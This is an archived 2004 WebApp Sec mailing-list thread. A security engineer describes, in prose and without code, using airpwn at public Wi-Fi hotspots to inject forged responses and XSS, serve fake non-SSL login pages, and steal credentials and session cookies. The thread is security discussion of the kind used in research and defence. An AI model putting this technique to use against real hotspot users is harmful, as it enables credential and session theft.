WebApp Sec mailing list archives
RE: alternate (new?) web app exploitation angle--too much coffee version
From: "Evans, Arian" <Arian.Evans () fishnetsecurity com>
Date: Mon, 4 Oct 2004 09:46:53 -0500
-----Original Message----- From: Jeremiah Grossman [mailto:jeremiah () whitehatsec com]
is this basically a combo of Wifi-Hijack with XSS involved? Just making sure Im reading you right.
Yes-no. My post is way too long for readability, isn't it? :( You don't have to hi-jack anything; you are just beating the webserver to the punch in responding to the client. I tried to be humorous below but definitely did not succeed. airpwn makes injection with unencrypted sessions trivial (constructing the response and submitting to the client in a timely fashion may not be trivial, but the act of injection is); any attacks against wi-fi encryption itself are separate. The real goal for me here is breaking the SSL session to get at the good stuff. The best thing I can do so far is assume a get verb (on behalf of the client) and respond with a valid (non-SSL) construct of a login page for a client to re-post their login data. Assumption that the client is thinking something broke and they have to login again. Problems I run into are (a) browser pop-up and (b) postable forms that only allow SSL connection and don't re-direct on the assumption the login page is also SSL-only. Arian
On Friday, October 1, 2004, at 10:52 AM, Evans, Arian wrote:Arian Security Advisory 01.10.04 I. VENDOR: I'm not very smart, but I stumbled onto something new to me this week. II. <DISCLAIMER> Hopefully I'm not a total idiot and everyone's already thought of this/done this and it's a completely banal post simply missing a "Secrets of the XSS Injection Masters" PDF linking to my super-XSS-injection defender box. </disclaimer> III. DESCRIPTION: Rainy Friday Script/Command injection fun: airpwn + app you're testing + $client.wireless.hotspot IV. ANALYSIS: It's slick, it's simple, and it scales nicely =) Something useful did come out of Defcon 12... Now most of the juicy bits you want are probably wrapped in an SSL tunnel which you won't be getting here, unless you 'break' the session...read on, I am still figuring out ways to break and restart the SSL session. So this attack is more of novelty value but nice quick way to demonstrate arbitrary script execution on dozens of clients in parallel. Or exploitation of the client's app. Or fill a bored Saturday in the excitingly cosmopolitan Kansas City. V. PROOF of CONCEPT:--grab a response from the webapp. Rebuild it. Respond it to the clients. Force them to re-enter their input, click on submit.... or send them a link, or or or Obviously you could send the client a bomb directly with this, but perhaps you want something out of their session so now you brute-force break their session by sending a new login page and made them log back in with your XSS. You get session cookie/parameter and credentials, the Britney pics, a good laugh, etc. VI. WORKAROUND: CAT5/6. VII. BACKGROUND: Some smart CS student tried messing with people (me) at a hotspot next to a local university and it switched me into <evil> mode and resulted in something a lot more interesting than this XSS. CS major got the smackdown from the GED. VIII. DISCLOSURE TIMELINE: </evil> Think of a recent related Windows exploit and your lights should go on quicker than mine did at something else you can do with this approach. Look for another post this weekend from a non-work account to BT and FD lists; if BT mod- -bounces I'll post to pen. IX. VENDOR RESPONSE: Can't decide if this is pen or web. Use your powers for good. If you see me in KC this weekend with a laptop that says "PLEASE WAKE ME FOR MEALS" on the lid, turn off your 802.11b and find a landline. :) Arian Evans Sr. Security Engineer FishNet Security KC Office: 816.421.6611 Direct: 816.701.2045 Toll Free: 888.732.9406 Fax: 816.474.0394 http://www.fishnetsecurity.com The information transmitted in this e-mail is intended only for the addressee and may contain confidential and/or privileged material. Any interception, review, retransmission, dissemination, orother useof, or taking of any action upon this information by persons or entities other than the intended recipient is prohibited by law andmay subjectthem to criminal or civil liability. If you received this >communicationin error, please contact us immediately at 816.421.6611, and delete the communication from any computer or network system.
Current thread:
- alternate (new?) web app exploitation angle--too much coffee version Evans, Arian (Oct 03)
- <Possible follow-ups>
- RE: alternate (new?) web app exploitation angle--too much coffee version Evans, Arian (Oct 04)